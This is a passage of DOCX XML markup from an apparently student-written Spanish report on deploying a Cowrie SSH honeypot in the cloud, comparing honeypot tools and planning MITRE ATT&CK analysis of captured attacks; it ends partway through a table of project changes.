                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Salida JSON</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Sí</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Adecuación a servidor pequeño</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Óptima</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Aceptable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Limitada</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Inviable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 2. Comparativa de honeypots SSH.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Cowrie ofrece la mejor relación entre profundidad de captura, facilidad de instalación y requisitos hardware. Esto lo hace especialmente adecuado para un proyecto académico desplegado en un servidor cloud pequeño, con pocos núcleos y unos pocos GB de RAM. Kippo, su predecesor, está abandonado y no recibe actualizaciones de seguridad. Honeyd solo ofrece baja interacción, insuficiente para observar el comportamiento post-autenticación. T-Pot integra múltiples honeypots pero requiere 8 GB de RAM como mínimo, lo que lo hace inviable en un servidor de ese tamaño.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">La elección del marco MITRE ATT&amp;CK para clasificar la actividad observada responde a su adopción generalizada en la industria como lenguaje común para describir comportamientos adversarios. Desarrollado y mantenido por MITRE Corporation con actualizaciones trimestrales, el framework cataloga las tácticas (el «por qué» de una acción), las técnicas (el «cómo») y los procedimientos (la implementación específica). Permite traducir los hallazgos técnicos del honeypot a un formato que cualquier equipo de seguridad puede interpretar y utilizar para mejorar sus defensas, facilitando además la comparación de hallazgos entre diferentes investigaciones y organizaciones.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:keepNext/>
        <w:pageBreakBefore/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Introducción</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El presente proyecto consiste en el despliegue de un honeypot SSH en la nube pública, la captura de ataques reales durante un período prolongado y el análisis de los datos obtenidos para generar un informe de inteligencia de amenazas. Se enmarca en el Proyecto Intermodular del ciclo de ASIR, integrando competencias de varias asignaturas: administración de sistemas Linux, seguridad informática, scripting y redes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El sistema se compone de tres elementos principales: un servidor cloud con el honeypot Cowrie expuesto a Internet, un conjunto de scripts Python para el análisis automatizado de los logs y un laboratorio local donde se procesan los datos y se genera el informe final. El resultado es un flujo completo de inteligencia de amenazas, desde la captura de datos brutos hasta la producción de artefactos accionables como rankings de IPs, gráficas estadísticas y un mapeo MITRE ATT&amp;CK con recomendaciones defensivas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Este documento constituye la memoria técnica del proyecto, describiendo la arquitectura del sistema, las decisiones de diseño, la metodología seguida, las tecnologías empleadas y las conclusiones extraídas del análisis de los ataques capturados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Evolución respecto al Anteproyecto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El anteproyecto planteaba la idea y un desarrollo en seis fases. Durante esta primera etapa el proyecto se ha estructurado en ocho fases con el desglose RFTP, se han automatizado el despliegue y el análisis, y el honeypot está en funcionamiento desde el 4 de octubre de 2026. La Tabla 3 resume los cambios y su motivo.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29"/>
        <w:gridCol w:w="1985"/>
        <w:gridCol w:w="4525"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Aspecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Anteproyecto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Situación actual y motivo</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Plataforma cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Oracle Cloud, capa gratuita</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Hetzner Cloud (CX23, Núremberg). Oracle no tuvo capacidad en más de 600 solicitudes y no había otras alternativas gratuitas viables.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cortafuegos del servidor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UFW</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">iptables, más el Cloud Firewall del proveedor. UFW no permite crear la redirección NAT del puerto 22 con sus comandos.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Despliegue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pasos manuales</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tres scripts idempotentes con comprobaciones que impiden perder el acceso al servidor.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Análisis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scripts Python para rankings y gráficas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Analizador modular con geolocalización, ficheros capturados por hash, clientes SSH y clasificación automática en MITRE ATT&amp;CK con 50 pruebas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Planificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Seis fases</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Ocho fases con desglose RFTP, diagrama de Gantt y estimación de 109 horas.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Captura</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Dos o tres semanas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="2850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Iniciada el 4 de octubre, diez días antes de lo previsto, y ampliada hasta finales de octubre.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Coste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
